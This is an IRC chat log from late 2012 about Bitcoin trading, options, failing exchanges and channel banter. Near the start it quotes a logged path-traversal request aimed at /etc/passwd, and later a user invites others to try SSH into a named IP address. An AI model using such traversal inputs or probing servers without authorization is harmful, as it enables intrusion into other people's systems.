polimedia Nov 19 07:38:45 like, automated acunetix or w/e it's called that thing Nov 19 07:38:50 ./././././././././. etc Nov 19 07:39:10 can't the script kiddies just get together, compare notes and engage in bro-love instead ? Nov 19 07:39:46 yeah i'm sure the same scan will be looking for cold fusion and asp as well Nov 19 07:39:54 it is. and for windows ini Nov 19 07:40:02 so subtle Nov 19 07:40:03 lol cfm ftw Nov 19 07:40:06 and patently retarded shit like cat passwd Nov 19 07:41:12 5.39.68.159 - - [18/Nov/2012:15:42:40 -0500] "GET Nov 19 07:41:19 /fain/comercial/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd Nov 19 07:41:25 he literally has a literal etc in there. Nov 19 07:41:59 clearly a bromosexual Nov 19 07:42:39 You want misfits that have found no better way to spend their lonely time than looking to damage web properties to SOCIALIZE and SHARE thing? Nov 19 07:42:57 Namjies i bet you it's butthurt forum people who figure in their own mind they know shit. Nov 19 07:43:01 AND WILL PROVE IT TO ME Nov 19 07:43:24 the only irritating part is that after they fail they don't consequently get assraped by a velociraptor. Nov 19 07:43:33 this lack of dire consequences for failure is getting on my nerves. Nov 19 07:43:57 No, but seriously, they have to share, or they wouldn't have got their hands on their scripts in the first place. Nov 19 07:44:12 well then can't they share that the stuff dun work ? Nov 19 07:44:33 no that isnt important to them, they just add the failures to things to try Nov 19 07:44:38 typical 16yo dickery, except 20 years ago they were telling stories about the women they fucked. Nov 19 07:44:43 It apparently works sometimes. Nov 19 07:44:57 Just not so well when you want to attack a specific server. Nov 19 07:45:04 nope. worked sometimes 10 years ago Nov 19 07:45:06 pigeons i want the old west back. you pull your gun and miss ? you'll be missed. Nov 19 07:45:40 he's right Namjies, i did a piece on it a few days ago. people were trying stuff literally patched in the 2005 edition of asp.net Nov 19 07:45:45 against a linux machine. Nov 19 07:46:38 it comes about from not having to have any discretion i think. "oh i'm using some wndows botnet, who cares if i lose it". also oh i'll run a tool from someone cared so little about they made it public, and is used for people who don't care about stealth they are using it on their own servers Nov 19 07:47:10 well ya, and that lack of discretion isn't born out of the complete lack of dire consequences for failure ? Nov 19 07:47:27 we live in a spam culture. Nov 19 07:47:36 yeah Nov 19 07:48:35 once kids realise that the worst that can happen if they say something stupid is nothing at all they can never stop yammering. Nov 19 07:48:36 If you scan at large for machines to hack, I'm sure some guy with a single website on a small machine has not updated since then... Nov 19 07:48:57 Namjies im pretty sure these are directional. Nov 19 07:49:13 i can tell by a few pixels and also the very particular time distribution Nov 19 07:49:13 also they scan for shit from 2001 Nov 19 07:49:46 Yeah, well as I said, those scripts don't work so well when you want to attack a specific server. Nov 19 07:50:11 Attack Mode: Weaksauce Nov 19 07:51:01 But you know there's a few businesses out there that update their software every 20 years or so. An that's almost not an hyperbole. Nov 19 07:51:17 http://i.dailymail.co.uk/i/pix/2012/07/14/article-0-140E5A33000005DC-550_964x984.jpg Nov 19 07:51:33 quick quizz : what profession did Delphaline, aged 17 in the pic go into ? Nov 19 07:51:40 a. world bank president Nov 19 07:51:51 b. oil field worker Nov 19 07:51:57 c. las vegas. Nov 19 07:52:18 It blows my mind that any machine that exists on public IP space currently, and is in a legacy OS setup wouldn't already be compromised. Nov 19 07:53:11 mod6 i have one that runs sarge. Nov 19 07:53:15 why'd it be compromised ? Nov 19 07:54:00 a lot of it will be old bots cut off from the c&c but still scanning Nov 19 07:54:39 who pays the power bill? Nov 19 07:56:05 why wouldnt the bill be paid? server is still sitting there doing its job, its just doing another job too Nov 19 07:56:22 lost count of how many times I've heard 'we got a security expert in to fix it' Nov 19 07:56:39 who either did nothign at all or patched the hole but left the infection Nov 19 07:56:39 that may be it yeah. Nov 19 07:57:06 reminds me of the fallout2 intro. Nov 19 07:57:14 eheh, old bots, forgotten by their hacker and still in use by the business. That little unkown process just sending odd requests outside. Nov 19 07:57:14 their souls, mingled into the background radiation... Nov 19 07:57:16 haha crap. my laptop batter died -- shutting downmy box ... Nov 19 07:57:19 one sec. Nov 19 07:57:23 Fallout 2! Nov 19 07:57:23 I had a box get botted many moons ago via ssh bf and a retarded user Nov 19 07:57:41 imbarassingly I only noticed because I had too many connections to undernet suddenly Nov 19 07:57:52 lol Nov 19 07:57:59 the soul of discretion. Nov 19 07:58:06 I have to play that game again. Nov 19 07:58:17 tracked it to some romanians Nov 19 07:58:17 oh anyway, just saying how there are so many random attacks from bots etc. many winders machines get pwned if not updated on the regular Nov 19 07:58:18 Namjies fallout 1/2 rocked. pity they fucked the franchise later. Nov 19 07:58:22 dub shocking. Nov 19 07:58:32 i know Nov 19 07:58:54 I had some fun with the Fallout Tactics one but really not the same thing. Nov 19 07:58:59 not at all. Nov 19 07:59:04 was more like a civ Nov 19 07:59:18 you ever played the xcom thing ? was before fallout Nov 19 07:59:24 shooting alien invaders. Nov 19 07:59:44 Nope Nov 19 08:00:07 bbs Nov 19 08:00:15 http://en.wikipedia.org/wiki/UFO:_Enemy_Unknown Nov 19 08:00:25 was back in the early 90s sometime Nov 19 08:00:34 xcom: enemy unknown, yeah they've jsut done a new one Nov 19 08:00:42 one of the best games ever Nov 19 08:01:57 i didn't much like the 2 Nov 19 08:02:01 and stopped trying after that. Nov 19 08:03:03 Early 90s? I mostly know of NES games **** BEGIN LOGGING AT Mon Nov 19 13:03:13 2012 Nov 19 13:04:18 [MPEX] [S.MPOE] 21417 @ 0.00050215 = 10.7545 BTC [+] Nov 19 13:04:19 [MPEX] [S.MPOE] 6478 @ 0.00050218 = 3.2531 BTC [+] Nov 19 13:27:15 Kongzi beta-8 is over 10,000 SLOC. Not LOC, SLOC. Nov 19 13:27:24 who the hell is proud of having written MANY lines of code ? Nov 19 13:27:45 if someone told me gcc is eighteen lines i'd be impressed. eighty million... sounds like windoze. Nov 19 13:39:04 10k? thats not much Nov 19 13:39:31 dm is like 2k Nov 19 14:11:56 http://www.youtube.com/watch?v=EdR_fHr_6Eg Nov 19 14:14:51 mircea_popescu: when did this clown started to code? Nov 19 14:15:26 he has serious problems adding 2 numbers or getting a simple function right in spreadsheets Nov 19 14:16:04 now he is coding a world best web site? SolidCoin was almost as delusional as this guy Nov 19 14:24:14 http://www.cryptoxchange.com/blog/21/crypto-x-change-suspending-trading-and-returning-client-funds Nov 19 14:35:53 great. i s'pose intersango is next. Nov 19 14:38:40 hm Nov 19 14:38:50 cryptostocks will live on or no then Nov 19 14:44:26 cryptostocks seem to be linked to vircurex, not to cryptoxchange Nov 19 14:47:31 and here we go again. another exchange bites the dust. At least people do not get glbsed Nov 19 14:48:04 that remains to be seen Nov 19 14:48:40 correct Nov 19 14:49:19 "we will be...." and everyone gets fucked Nov 19 14:51:39 coincidence? http://www.northlandbitcoins.com/ Nov 19 14:59:29 hi usagi Nov 19 14:59:51 dn't you plan to release these 10k of SLOC (not LOC) open source? Nov 19 15:01:16 just i am, cause i'm very curious, how such deadly serious business is coded Nov 19 15:02:15 there must be some very enterprise-y techniques involved there Nov 19 15:03:35 i'd ask average american Nov 19 15:04:12 ;;getrating kakobrekla Nov 19 15:04:12 WARNING: Currently not authenticated. User kakobrekla, rated since Fri May 13 15:50:53 2011. Cumulative rating 85, from 49 total ratings. Received ratings: 49 positive, 0 negative. Sent ratings: 50 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=kakobrekla Nov 19 15:04:32 you mean you have a generator of noncorrect answers? Nov 19 15:05:42 usagi what is the difference between LOC and SLOC? Nov 19 15:06:29 do you have a lot of comments usagi? Nov 19 15:06:59 LOL, I guess this guy has no idea wtf "process management" is and how to use it Nov 19 15:07:05 dunno, this needs some clarification " you know that all the answers which are wrong are false" Nov 19 15:07:37 jurov: have you never read sherlock holmes man? Nov 19 15:07:49 you mean the computer can evaluate truthfulness of sentences? Nov 19 15:07:59 i am sure the Schenectady Light Opera Company is thrilled you donated 10k btc Nov 19 15:09:52 and you did it alone over a weekend, I s'pose? Nov 19 15:13:17 this? http://renli.wordpress.com/kongzi/ Nov 19 15:14:39 if the professional coders duplicated it with half as many SLOC would it cost half as much? Nov 19 15:14:48 lol Nov 19 15:15:18 will you hire me for a per line project? Nov 19 15:15:50 using modern tools and actual experience and knowledge of programming, it can be done for 1/10 or less Nov 19 15:16:04 " a per line project" LOL, sure. Nov 19 15:17:35 ok, hire me for the most expensive language Nov 19 15:18:23 let's do the same thing but with a different language. Let's try chinese or something Nov 19 15:20:41 oh ok, let's do one that teaches woodworking then Nov 19 15:20:42 did you really teach English? Nov 19 15:20:42 how much would you sell your $300,000 program for? Nov 19 15:21:19 first grade or second grade? Nov 19 15:22:08 do those count as SLOC? Nov 19 15:23:12 i've worked on some big projects, but my part was quite small Nov 19 15:24:21 You should add "in the cloud" to your site. It will be cooler. Learn japanese in the cloud Nov 19 15:25:11 you had 6 Nov 19 15:25:19 world wide clients Nov 19 15:25:23 users Nov 19 15:25:25 what ever Nov 19 15:26:16 6 members worldwide? yes it is Nov 19 15:26:33 that's great. are they paying? Nov 19 15:27:36 but you hardly speak it yourself Nov 19 15:27:48 that's the beauty of this system Bob Nov 19 15:27:57 how can you teach something you have no knowledge? Nov 19 15:28:12 you just tell it what is false, and the computer figures out the rest Nov 19 15:28:25 OO that's cool Nov 19 15:29:57 usagi: can we use the program to teach karate? Nov 19 15:30:17 like you did in 2003? https://www.google.com/search?q=usagi+%22Oliver+Richman%22 Nov 19 15:30:46 bob i am much more subtle Nov 19 15:31:16 is Serena better? Nov 19 15:31:22 or is it Appledog? Nov 19 15:31:57 same shit over again https://groups.google.com/forum/#!msg/rec.martial-arts/ly5cmb5i8bc/aBX3EztwQ4YJ Nov 19 15:31:59 usagi what is your first name by the way? Mine is Dan Nov 19 15:32:35 usagi: you are right. I am really bad troll. I am actually not even worth the "troll" name Nov 19 15:33:05 usagi: no i do not but I can probably shoot you down from 400 meters :) Nov 19 15:33:15 or 1 m, if you like Nov 19 15:33:24 wait i thought you weren't oliver? Nov 19 15:33:32 or just kick your ass with one hand Nov 19 15:33:58 i did my study of tao with Mr Norris Nov 19 15:34:55 so you post to r.m-a, and people write songs about you, but you aren't the oliver who posts there and people write songs about? which one are you? Nov 19 15:35:10 I am a coder. I am writing a fkn cms from 2001, based on 80's code - fkn fabulous, It will be the best karate teaching page on the world Nov 19 15:36:16 >80s code Nov 19 15:36:20 cobol or fortran? Nov 19 15:37:07 is it bigger or smaller than a breadbox? Nov 19 15:37:10 who knows memvola? Nov 19 15:37:20 i met her once or twice Nov 19 15:37:23 Diablo-D3: big like a fkn house Nov 19 15:37:31 her? Nov 19 15:37:47 i hope not usagi Nov 19 15:38:00 wait, why would anyone name themselves memvola? Nov 19 15:38:05 it is better with out wankers like you ;) Nov 19 15:38:19 thats the esperanto word for willing Nov 19 15:38:52 usagi: we all know that by now. Nov 19 15:39:06 and you have been kicked out from multiple forums Nov 19 15:39:25 real life. Nov 19 15:39:43 since 2001? lol Nov 19 15:39:48 Ive been Diablo-D3 since 1991. Nov 19 15:39:57 I AM OLDER THAN THE INTERTUBES ITSELF Nov 19 15:40:16 BOW BEFORE MY MIGHT! Nov 19 15:44:36 usagi: were you born female? Nov 19 16:03:49 ACHIEVEMENT UNLOCKED: Persecution Complex Nov 19 16:04:33 pigeons: usagi wasnt born female, you know how I know? Nov 19 16:04:41 no female can resist my manlyness. Nov 19 16:07:07 wtf are you blabbering usagi, you promised to leave and do what ever you do when you are not trolling bitcoin community Nov 19 16:20:53 [MPEX] [S.MPOE] 24800 @ 0.00050218 = 12.4541 BTC [+] Nov 19 16:41:41 now he is coding a world best web site? << maybe he's pasting stuff from the interwebs Nov 19 16:43:27 will you hire me for a per line project? << yes. five cents :D Nov 19 16:43:49 comments included? Nov 19 16:44:20 OMG the saga continues Nov 19 16:44:44 5 cents? Nov 19 16:44:45 jesus Nov 19 16:44:58 wait, what sort of line? java line or perl line? Nov 19 16:45:09 im counting on comments. Nov 19 16:50:03 oh great even blank lines count. Nov 19 16:52:10 SLOC meansno comments or blank lines Nov 19 16:52:22 doesnt mean I cant use abusively weird formatting though Nov 19 16:52:27 https://bitcointalk.org/index.php?topic=121622.msg1344982#msg1344982 Nov 19 16:52:30 kinda related. Nov 19 16:53:01 hrm Nov 19 16:53:02 >but the most common definition of physical SLOC is a count of lines in the text of the program's source code including comment lines. Blank lines are also included unless the lines of code in a section consists of more than 25% blank lines. In this case blank lines in excess of 25% are not counted toward lines of code. Nov 19 16:53:26 well Nov 19 16:53:32 the real sloc method is just using sloccount Nov 19 16:53:36 anyway it would cost professionals $300K to write that many SLOC! Nov 19 16:53:38 ffs srsly, who came up with bragging about this ? the only time sloc/loc is relevant is if you're trying to determine how much old pos code will cost to maintain Nov 19 16:53:41 never try to do it by hand Nov 19 16:53:44 they're a liability not something to be proud of Nov 19 16:53:46 pigeons: how many? Nov 19 16:53:57 Diablo-D3: usagi said $300K Nov 19 16:54:02 no how many sloc Nov 19 16:54:08 i dont give a fuck im just trying to get payed for excessive commenting. Nov 19 16:54:12 10000 SLC Nov 19 16:54:13 paid. Nov 19 16:54:15 10k? wtf. Nov 19 16:54:17 paid Nov 19 16:54:21 I've done 10k in a fucking weekend Nov 19 16:54:29 people need to learn how the fuck software development works Nov 19 16:54:53 no, thats just you mircea_popescu Nov 19 16:55:11 tbh, i prefer the thigh and i don't think i've done fifty lines yet. Nov 19 18:06:53 [MPEX] [S.MPOE] 7022 @ 0.00050218 = 3.5263 BTC [+] Nov 19 18:06:55 [MPEX] [S.MPOE] 13628 @ 0.00050219 = 6.8438 BTC [+] Nov 19 18:25:08 [MPEX] [S.MPOE] 30066 @ 0.00050219 = 15.0988 BTC [+] Nov 19 18:29:50 hahahaha Nov 19 18:58:28 Could someone remind me what the gribble command is to do lastseen? I thought it was ;;lastseen username Nov 19 18:59:26 ;;seen gribble Nov 19 18:59:26 I have not seen gribble. Nov 19 19:00:25 Thank you Nov 19 19:01:07 Oh. guruvan hasn't been around in a long while. Nov 19 19:01:49 Someone bored and wanna see if they can ssh into 199.27.134.223? Nov 19 19:05:17 i can't Nov 19 19:05:23 at leas not port 22 Nov 19 19:06:09 That's the port # I tried. Nov 19 19:06:26 But I didn't know if it was my mobile tether of 44kbps fucking up or not. :) Nov 19 19:07:46 Anyway - that's the address which came up for GLBSE. Maybe Nefario is really worried about the legality of releasing asset info. Nov 19 19:08:34 what does it have with ssh? Nov 19 19:09:21 Idunno. Futzing around, wondering if Nefario may've left everything wide open to evade liability. **** ENDING LOGGING AT Mon Nov 19 19:36:14 2012 **** BEGIN LOGGING AT Mon Nov 19 21:17:06 2012 Nov 19 21:35:48 https://bitcointalk.org/index.php?topic=121622.msg1345365#msg1345365 Nov 19 21:35:51 the forum delivers. Nov 19 21:43:50 Hey, if it was Mad Max, would sound fine, but it's a *MAD* Mad Max Nov 19 21:44:05 Proof: He wants to accept Paypal for a bitcoin casino?!? Nov 19 21:45:27 the funny thing is, Nov 19 21:45:41 he's all pretentious and talks shit to mpoe-pr ?! Nov 19 21:53:25 lol first bitcoin casino on the internet my ass Nov 19 21:53:35 nono you don't understand Nov 19 21:53:42 unique snowflake mode ENGAGE Nov 19 21:54:02 haha Nov 19 21:57:06 btw mod6 there's something i wanted to talk to you about. we could like, make this site right ? except not really a site, more like some servers Nov 19 21:57:10 and yeah, .onion bitcoin casinos were pretty awesome in mid-2011, at least playable anyway. Nov 19 21:57:12 and then people could connect to them and chat. Nov 19 21:57:18 it would be the first chat system on the internet Nov 19 21:57:30 not just text either, and then seals with clubs Nov 19 21:57:39 thats regular intarweb tho Nov 19 21:58:06 oh. Nov 19 21:58:38 right on. Nov 19 21:58:53 i used to run a silc server back in the day. Nov 19 21:59:11 we all liked it a lot -- its all encrypted by default, etc Nov 19 21:59:44 could be an interesting multi-node network or something that could be apart from openprojects Nov 19 21:59:47 err freenode Nov 19 21:59:47 wasn't the encryption weak tho ? Nov 19 21:59:53 in silc i mean Nov 19 22:00:18 im not sure it was weak -- per-se...i remember it being based on asymmetric algos Nov 19 22:00:46 i have but vague recollections. Nov 19 22:00:47 i'd have to look quick --- haven't looked at it in some time... there might be something better if that's kinda what you were gettin at. Nov 19 22:01:18 The SILC implementation of its own spec is poor in that it is vulnerable to weak authentication which undermines any strong encryption it might have. For example, it is impossible to differentiate between two users whose keys you have verified before. If you verify these two user’s keys, and one of those users decides to impersonate the other one, SILC will happily continue without even mentioning this appalling situ Nov 19 22:01:18 ation. Nov 19 22:01:20 ya right i was. Nov 19 22:01:41 https://we.riseup.net/riseup+tech/problems-with-silc Nov 19 22:02:33 ahhh Nov 19 22:03:23 i never used it, but i recall vaguely it was because tech gave it a neg report. this was years ago Nov 19 22:03:30 yeah, i guess I was using it like prior to 2004 Nov 19 22:03:58 funny how ancient that is huh. Nov 19 22:03:59 anyway, there are other ways if that's the overall goal though Nov 19 22:04:09 im relatively happy with otr tbh. Nov 19 22:04:17 hhaha, ikr! like 100,000,000 internet years Nov 19 22:04:36 not that i need that much secrecy anyway. da fuck are they gonna expose, my private flirting with internet womenz ? Nov 19 22:05:14 haha. i thought perhaps some of the auth stuff could be built into a sortof OTC login model we're doing with gribble... Nov 19 22:05:52 i dunno, just a thought of a different way to get everyone auth'd on the same host with their keys without having to rely on a bot or 3rd party app Nov 19 22:06:43 food for thought i guess. right now though, it works pretty krad. :] Nov 19 22:07:59 im kinda curious how wot2.0 will be so Nov 19 22:09:16 yeah, that'll be awesome Nov 19 22:09:27 be back in a min here... Nov 19 22:13:31 mircea_popescu: any word from harnett's employers Nov 19 22:14:11 not so far actually. Nov 19 22:14:26 which seems kinda odd. but hey, give them a week or w/e Nov 19 22:16:00 in other news, both cryptoexchange and intersangro are closing, pretty soon we'll be exchangeless at this rate. Nov 19 22:20:44 mircea, somehow, when trying to do a MKOPT, it returns "You need at least 0.00000000 BTC to cover these." Nov 19 22:20:45 Also, fair warning - next week I'll be travelling to Macau, the gambling capital of Asia, to present at a gaming conference. I'll be showing SatoshiDICE to many people, including gambling entrepreneurs and business men. Nov 19 22:20:45 It is possible that certain business deals could happen as a result of this trip. If you were considering buying shares of S.DICE, you may want to do it quickly. Who knows what a rich Macau gambling magnate might think of a system which allows wagering in any amount, from anywhere in the world, anonymously... Nov 19 22:20:48 says evoorhees Nov 19 22:21:06 Namjies that's odd... Nov 19 22:21:30 Aye, thanks Nov 19 22:23:05 Namjies : retry. Nov 19 22:23:18 (desync with trade db) Nov 19 22:24:25 odd... tells me I need much more than expected Nov 19 22:24:48 isn't put option strike/spot? Nov 19 22:25:12 and fee 2%? Nov 19 22:25:53 [MPEX] [S.MPOE] 36000 @ 0.00050221 = 18.0796 BTC [-] Nov 19 22:25:54 no, it's not / spot. it's / some risk adjusted value Nov 19 22:25:55 [MPEX] [S.MPOE] 5222 @ 0.00050225 = 2.6227 BTC [+] Nov 19 22:25:56 [MPEX] [S.MPOE] 6499 @ 0.00050229 = 3.2644 BTC [+] Nov 19 22:25:56 [MPEX] [S.MPOE] 8629 @ 0.00050232 = 4.3345 BTC [+] Nov 19 22:25:58 close to the average tho. Nov 19 22:26:20 so it shouldnt be MUCH more than you expect. maybe a little more Nov 19 22:27:14 gives me 10% extra (excluding 2% fee) Nov 19 22:28:04 looks pretty high a fee Nov 19 22:29:41 http://blog.smickles.com/bitcoin/the-ponzi-of-wikipedia-and-bitcoin/ Nov 19 22:29:48 for your reading pleasure :D Nov 19 22:30:18 mircea_popescu: You're going to be the guy presenting sdice to Macau? Nov 19 22:30:32 nope ? Nov 19 22:30:48 i'm too old to be going for these tricks, getting arrested in macau and whatnot. Nov 19 22:30:55 oh, you were quoting someone then Nov 19 22:31:07 Namjies it wouldn't be a fee tho, the fee is 2%. the collateral oyu get back. Nov 19 22:31:14 smickles evoorhees Nov 19 22:31:23 that make sense Nov 19 22:31:23 https://bitcointalk.org/index.php?topic=101902.msg1345687#msg1345687 Nov 19 22:31:40 eh, sorry, extra collateral Nov 19 22:33:53 well Nov 19 22:33:57 it took me two days Nov 19 22:34:17 but Ive rewritten half of diablominer and modularized the internals Nov 19 22:34:29 Namjies prolly best idea is to do very small bits first, get a good feel of how it works. Nov 19 22:34:46 https://bitcointalk.org/index.php?topic=126616.msg1344098#msg1344098 umm. Nov 19 22:34:54 [MPEX] [O.BTCUSD.P130N] 214 @ 0.25593421 = 54.7699 BTC [-] Nov 19 22:35:04 I can't stop with the satoshidice. That game is evil. I really thought I was going to hit "big" one day. Every time I would hit big, the standard would raise until I lost control. Big became bigger. I was paying every loan off quickly and was satisfied with the profits + 10 to 20btc. Nov 19 22:35:52 I understand how it works... Nov 19 22:36:05 I wasn't aware the collateral was adjusted Nov 19 22:36:22 By such a big margin Nov 19 22:37:01 beta options at weexchange.co are also 10% Nov 19 22:37:21 lol... I had funds loaned to Lurk on BTCJam multiple times Nov 19 22:37:39 I had them all repaid however Nov 19 22:37:45 btcjam debt = 92.25btc Nov 19 22:37:52 there kakobrekla, that's 100 btc that won't be repaid. Nov 19 22:38:13 pigeons o, they're doing options ? Nov 19 22:38:19 mircea_popescu: yes Nov 19 22:38:21 cool. Nov 19 22:38:30 just started, still testing Nov 19 22:38:52 mircea_popescu not my money. Nov 19 22:38:52 all i see is a login page. but anyway. Nov 19 22:40:16 kakobrekla was re Nov 19 00:35:52 at least 65 of em Nov 19 22:40:17 Well, at least he's honest about it. Nov 19 22:40:33 Namjies that's a point. Nov 19 22:40:55 he's not even so bad in the hole, coupla hundred btc big deal. he can make that in a month. Nov 19 22:41:17 If he had a job. He's unemployed apparently Nov 19 22:41:59 Total Transactions 12445 Nov 19 22:41:59 Total Received 16161.82241607 BTC Nov 19 22:41:59 Total Sent 16161.82093528 BTC Nov 19 22:42:02 holy fucking cow Nov 19 22:42:07 he's under by like... 1% ? Nov 19 22:42:09 that's nothing. Nov 19 22:43:51 [MPEX] [S.DICE] 4860 @ 0.00339922 = 16.5202 BTC [-] Nov 19 22:44:03 your pumping is working Nov 19 22:44:15 hahaha cool. Nov 19 22:44:39 (i was pumping ?) Nov 19 22:44:59 ;) Nov 19 22:45:18 Great. Sold a few options Nov 19 22:45:34 There's nice PUT bids right now Nov 19 22:45:38 [MPEX] [S.DICE] 8500 @ 0.00339922 = 28.8934 BTC [-] Nov 19 22:46:31 Many 5-15% margin on PUTs for next month Nov 19 22:46:44 With the reward halving coming up Nov 19 22:46:52 you figure price drops in dec ? Nov 19 22:47:12 No, raise. Nov 19 22:47:24 Or keep stable at least Nov 19 22:47:41 o, selling puts. yeah. Nov 19 22:48:25 There's thousands of bids for puts with 0.05 - 0.15 BTC over their current execution value Nov 19 22:49:17 A good net against a price drop and if price stay stable or raises with reward halving, the margin could increase. Nov 19 22:49:18 next month ? sure. Nov 19 22:50:06 Well honestly, I'd always feel much safer going with selling PUTs for over their execution price Nov 19 22:50:49 price sometimes drop but eh Nov 19 22:51:48 selling puts is a pretty reasonable way to protect yourself if you have $ and want btc. Nov 19 22:51:59 (if the price drops you lose on the puts but can buy the btc cheaper. if not you make btc) Nov 19 22:52:26 Aye Nov 19 22:52:57 which actually i guess is a position many people are in. Nov 19 22:54:41 I don't see why those PUT bids stay around for so long Nov 19 22:57:04 On another note, apparently, bASIC is shipping... Nov 19 22:57:44 "An estimated 84 percent of coinstar users are women". Not going to comment on this one. Nov 19 22:58:00 what do you mean stay around ? Nov 19 22:58:36 That people don't sell into them. I barely see any volume. Nov 19 23:01:33 Nov 18 22:02:22 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.88032553 = 880.3255 BTC [-] Nov 19 23:01:35 sorta thing Nov 19 23:03:20 Yeah, there's a few Nov 19 23:03:30 But not much compared to all the bids available Nov 19 23:03:39 especially for the ones expiring next month Nov 19 23:03:50 which have higher margins Nov 19 23:04:41 well i don't much expect the bot getting sold out Nov 19 23:04:54 in fact the situation this month where calls got wiped is singular, never happened before. Nov 19 23:07:50 smickles Nov 19 23:08:14 About qualifying Bitcoin as a ponzi because it advantages early adopters. Nov 19 23:10:49 lol. fucking hell, when you'rte born people already have dollars Nov 19 23:10:53 then you have to work to get them' Nov 19 23:10:55 PONZI Nov 19 23:11:28 Has anyone brought the stocks arguments yet? With example such as the $10000 Microsoft stake bought at IPO example? Nov 19 23:11:53 i don't think many people give two shits about wikipedia Nov 19 23:13:30 But in any case, the article says Bitcoin has been accused of being a ponzi... not that it meets the definition of a ponzi. Nov 19 23:13:38 Which is, technically, very true. Nov 19 23:14:00 well by this measure Bush was accused of being a reptillian Nov 19 23:14:24 I don't see any problem with that saying. Nov 19 23:15:51 You can say something is anything, and then go around saying that something has been accused of that anything. Nov 19 23:16:26 The accusation is a fact. If what you're accused of is true is not a fact. Nov 19 23:17:15 ya well not all this spam is worth the mention i'd think. Nov 19 23:21:08 [MPEX] [S.MPOE] 17171 @ 0.00050232 = 8.6253 BTC [+] Nov 19 23:21:10 [MPEX] [S.MPOE] 8674 @ 0.0005024 = 4.3578 BTC [+] Nov 19 23:38:18 lol at people telling the compulsive gambler he should try willpower and what he needs to do is "just say no" Nov 19 23:40:02 jeebus, connection issues Nov 19 23:43:30 Namjies: yes Nov 19 23:43:49 ^ re: < Namjies> Has anyone brought the stocks arguments yet? With example such as the $10000 Microsoft stake bought at IPO example? Nov 19 23:51:54 pigeons he can do anything! Nov 19 23:52:16 < pigeons> your pumping is working << naw, if anyone one it was me :P Nov 19 23:52:45 you were pumpin ? Nov 19 23:52:55 https://bitcointalk.org/index.php?topic=126703.msg1345683#msg1345683 Nov 19 23:53:01 fucking scammer heaven Nov 19 23:53:06 eh, not really, but remember i pointed out teh 1% gain possible Nov 19 23:53:12 at dividends Nov 20 00:01:32 i'm gong to make a bitcoin money laundering service called bitlaundry Nov 20 00:01:47 "it all comes out in the wash" will be our motto Nov 20 00:03:05 there;'s a ton of those already. Nov 20 00:03:15 mircea_popescu: is there any point in buying options if there isn't a big swing Nov 20 00:03:26 for instance if you buy puts as insurance to doing business with btc Nov 20 00:03:35 if you buy options you implicitly bet on a move. Nov 20 00:03:42 if you sell options you implicitly bet on calm Nov 20 00:04:38 so if you're selling some product Y for bitcoins, and you expect the price to drop, you buy puts Nov 20 00:04:56 so what if you expect the price to not move much you sell an option? Nov 20 00:05:21 did I understand you correctly? Nov 20 00:06:10 if you expect the price to go up significantly, you buy a call. Nov 20 00:06:15 if you expect the price to go down significantly, you buy a put. Nov 20 00:06:24 if you expect the price to NOT drop significantly you sell a put Nov 20 00:06:30 if you expect the price to NOT go up significantly you sell a call. Nov 20 00:08:15 lots of options (pun intended) Nov 20 00:08:51 lol Nov 20 00:13:36 thanks for explaining mircea_popescu, i feel as though I'm one of the ignorant kids sometimes Nov 20 00:13:50 eh no big deal Nov 20 00:14:48 un blod de mircea_popescu is being used as a reference for my research paper Nov 20 00:14:59 haha cool. Nov 20 00:15:07 blog* Nov 20 00:15:25 coinbr will have "options advisor" someday Nov 20 00:15:59 right after the "navigating the waters of btc securities safely" motto right below the mermaid Nov 20 00:16:16 who drew the mermaid? Nov 20 00:16:39 im not even sure. was a contest Nov 20 00:16:41 thebigheart, originally for mpex Nov 20 00:17:57 as everyone knows, sirens are the symbol of safe navigation :P Nov 20 00:18:13 :p Nov 20 00:18:15 also tits. Nov 20 00:18:51 yea, have hard time to decide between tits and boobs Nov 20 00:19:12 boobits Nov 20 00:21:16 aapl just won't stop plummeting Nov 20 00:21:29 too big to fail! Nov 20 00:21:43 lol Nov 20 00:21:50 someone was trying to get ppl to buy it in btc Nov 20 00:22:19 i was thinking, what a genius move. buy aapl in btc, six months later aapl is -40% in usd, the usd is -50% in btc... you've made a great investment Nov 20 00:23:00 or just do puts on aapl right as they announced the iphone 5 Nov 20 00:23:08 which was my general advice to people I was investing for Nov 20 00:23:12 who all got fucking rich Nov 20 00:23:21 i got a measely .2% because i'm nice :P Nov 20 00:23:59 [MPEX] [S.MPOE] 39349 @ 0.0005024 = 19.7689 BTC [+] Nov 20 00:24:47 lol mpex charges .2% Nov 20 00:25:07 you should charge more :P Nov 20 00:25:55 nah Nov 20 00:26:40 you already charge an illustrious membership fee Nov 20 00:26:42 XD Nov 20 00:27:32 lol Nov 20 00:28:29 ;;halfreward Nov 20 00:28:29 Estimated time of bitcoin block reward halving: Thu Nov 29 04:58:28 2012 UTC | Time remaining: 1 week, 2 days, 6 hours, 30 minutes, and 0 seconds. Nov 20 00:29:00 the rewardoclypse is among us. Nov 20 00:29:12 happy halving day Nov 20 00:29:15 it won't be long now. Nov 20 00:29:23 esp if basic actually delivers :D Nov 20 00:29:40 i suspect mpex will celebrate it by finally raising the fee to 50btc Nov 20 00:29:43 I think all asic manufacturers are lying Nov 20 00:29:58 50btc fee Nov 20 00:30:04 I should get and account now :( Nov 20 00:30:12 or perhaps a christmas special? Nov 20 00:30:14 :) Nov 20 00:30:22 buy 1 account get 1 free Nov 20 00:30:24 lol jk jk Nov 20 00:30:27 just use coinbr Nov 20 00:31:22 but but Nov 20 00:31:32 on the long term you're better of buying an acct now than later Nov 20 00:31:37 this was true all through Nov 20 00:31:50 extortion combined with laziness huh? Nov 20 00:32:10 no, it's just ponzi, ya know Nov 20 00:32:17 what can i tell you. there's no love for the idle. Nov 20 00:32:18 next time I here ponzi Nov 20 00:32:22 I'm slap someone back to 1920 Nov 20 00:32:22 all hail teh industrious Nov 20 00:32:41 industrialists sometimes fall Nov 20 00:32:54 if i was an industrialist I would be idle during the day and batman at night Nov 20 00:33:40 I here ponzi? or Here I ponzi Nov 20 00:33:53 hear* :) Nov 20 00:33:59 Here I am Charles Ponzi Nov 20 00:34:19 send me money so I can send overpriced stamps to my family back in europe Nov 20 00:34:22 tons of money in it Nov 20 00:34:23 invest early Nov 20 00:36:07 https://btct.co/ Nov 20 00:36:09 o look another one Nov 20 00:36:55 wtf is this .co I keep seeing Nov 20 00:37:19 and why does its 'nic' have invalid ssl cert Nov 20 